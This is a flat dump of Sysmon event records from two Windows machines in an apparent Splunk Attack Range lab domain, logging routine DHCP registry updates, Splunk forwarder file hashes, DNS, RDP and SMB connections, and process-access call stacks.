09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\LeaseObtainedTimeDWORD (0x615188c3) 13241300x8000000000000000976901Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\LeaseDWORD (0x00000e10) 13241300x8000000000000000976900Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\DhcpServer10.0.1.1 13241300x8000000000000000976899Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000976898Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\DhcpIPAddress10.0.1.15 13241300x8000000000000000976897Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\DhcpInterfaceOptionsBinary Data 354300x8000000000000000976896Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:55.823{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59276-false10.0.1.12-8000- 23542300x8000000000000000976924Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:00.945{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE8C7AC11663AF48D31EEA6ACC0DFDF7,SHA256=6100B4B815E826FB5ACCC80A119521694DC3F5DAA2E8CBC677915F163A7CD3CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:59.108{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49773-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001048322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:58.628{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63314-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:00.478{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD0CBF897F2BCAB2B94FD7E96CB50AE6,SHA256=B566CB87720883174AC51E1851D40F848AD6D4447C70835ACDB168AEE1921E09,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976923Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:56.754{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-56490-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:00.428{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C7035988F90B31A2BC1C2707BDA2004,SHA256=B544537D72EAE60FC4D11DA1B9F3E53B90272D557A000BAA13AFFE466A152FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976929Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:01.945{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF72538CEBC5B1481C9DCE7679ABFBBE,SHA256=419CBB577DA6488083731F60ACF4C0ADB67B26B70BC13C0B08A4F3C6D1F47E02,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:59.543{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15-64585- 354300x80000000000000001048325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:59.541{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15-59035- 23542300x80000000000000001048324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:01.497{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=113E745820F9E35A818E4A4017894DAF,SHA256=6F2B0B11E6F2E35725DFE19B7E7C9D6264F77EB0E4C92F02C1721C0D608D3B1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976928Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:58.480{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:c8a0:5491:e98:ffff-59852-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000976927Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:58.480{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:e060:eede:318:987awin-host-542.attackrange.local59852-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000976926Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:58.463{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-542.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 23542300x8000000000000000976925Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:01.320{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7AAE541B5E33BA88C39ED0F1BE24073,SHA256=C77B40073D8A268BE9D6F8CA133BF469C14422AC9C9EF7F13348C849FE43DF4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976931Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:02.946{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBD5DC346B43D2CD9E477CFCCD61995,SHA256=214D93500E3BF95AE46C3EE5BED3E147584438099D5E182B862A9A2FA3784B18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:02.554{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D922711EE2E87A4E421C17E97A241F2,SHA256=8FFE1BE9ED408A0F706625F865B9E358438ACD8F8FF6D9B5C3CEF302E9A0AE80,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976930Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:58.612{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50455-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976934Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:03.962{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3A31AEF28ECC120ED77CD27603D39F6,SHA256=CFC6B6CD206F7D4D2DEE217B7758E3F0D6A9816B5B597635D930ACEDC87CE429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:03.611{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F1ED182E643CD02034FDB563B58BF2D,SHA256=846AAC5EE16688D4D5615B2901767B9D7EB1F386C4956FE1F8E7F7788C80925F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976933Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:03.899{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D9C73BDBF1BFDEA97CCE6CADC7CBA05,SHA256=BB621A68B6DFD74D4B6E3E8DEB6554748FCBCC7D825B1C2AC1CF9396BB8CA113,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976932Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:00.899{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-27700-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976937Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:04.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B1F3CFC437F3F107B5076C554585C37,SHA256=D784B7B63B4B28866E59A6718F375F990B8D005D2E360A2C6A491C30344AF376,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:04.858{5EBD8912-7F30-614D-1600-00000000FC01}12682712C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:04.858{5EBD8912-7F30-614D-1600-00000000FC01}12682712C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:04.611{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFF8C19CF23D18984C71B27D3943909F,SHA256=AB761162C068B7027BEBA4CDB8A3B4A7C3672E3E15F6B52BD64660AAA9BE6763,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976936Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:01.825{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59277-false10.0.1.12-8000- 354300x8000000000000000976935Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:01.159{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49168-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:01.734{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49242-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000976940Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:05.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AF50AE958E4CB59D774440AD6FECF9D,SHA256=A72B146410CF423D0348EA400369217EBFA1BE75B04DCA7EB61176E3922CA3C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:05.642{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E39D548FB071C2CC13C1C273EF4A58A4,SHA256=1874E9233F03CC9C1AFF7133A2A56C43DB0C7B983C4362183FA477A37098093A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976939Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:05.884{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E24F41C3A423A054E7D3E43122F23249,SHA256=117B767AC9658CDF1B37B2F9B71BBCAF8680C3418FA475C4AF077A4BCFADCA0E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976938Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:02.876{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-39318-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976941Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:06.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1176FCD8252E057A580F63D93A286DCD,SHA256=4A341557251AACE8FC304981C50549B15DD7A9BF5848936118B19583C4DFB63A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:06.993{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:06.656{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A548F86C8A8593BEAA15A285B27A9710,SHA256=164017B61331AAEC694A324A435E964ADF3BA4A8DED40D7B5260E864F79F2939,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:06.294{5EBD8912-7F2D-614D-0B00-00000000FC01}6241764C:\Windows\system32\lsass.exe{5EBD8912-7F11-614D-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x8000000000000000976942Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:07.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28B34E015498E7DCB636BBC6D89799C8,SHA256=343A9CE9A848C916057FE31D94672E23952FE678FFD2F057121060D2EDC118E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:07.675{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=005DD16DE64319B139E9E612E2CBA904,SHA256=FF3DDD195C8EC8AC26E4BC53166070D1455F55793F7FFB698A633662547DF9A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:05.987{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49243-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001048339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:05.987{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49243-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 23542300x80000000000000001048338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:07.309{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=671B720D86A09CBF2AC46C433D09A513,SHA256=CD872D9992A6D16642CE8C89679EC718123C8A295BC075A88BF6D21662FD0C7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:07.309{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87B9904680FAC864DC7A1C1DC450A69E,SHA256=1126822A1DED0FC28E8A3BD232A7D3F0FED54795665BF8ADA19A990B02A23300,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:08.709{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:08.677{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18EAB4B44205E790BDED0F86CC92CACD,SHA256=F1E90F5376006AB7AD93497749DE4789E3B8604BDB9D12AADA87DD53F96240BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976944Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:05.461{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-57244-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976943Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:08.196{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B66A96AC8333187C69C93DC91EF8A78,SHA256=08F7DDEC8D08DD5D7D0A0FC6ADE02BF70F5A2C5C8B19EED096B91420C4E76145,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:08.472{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla 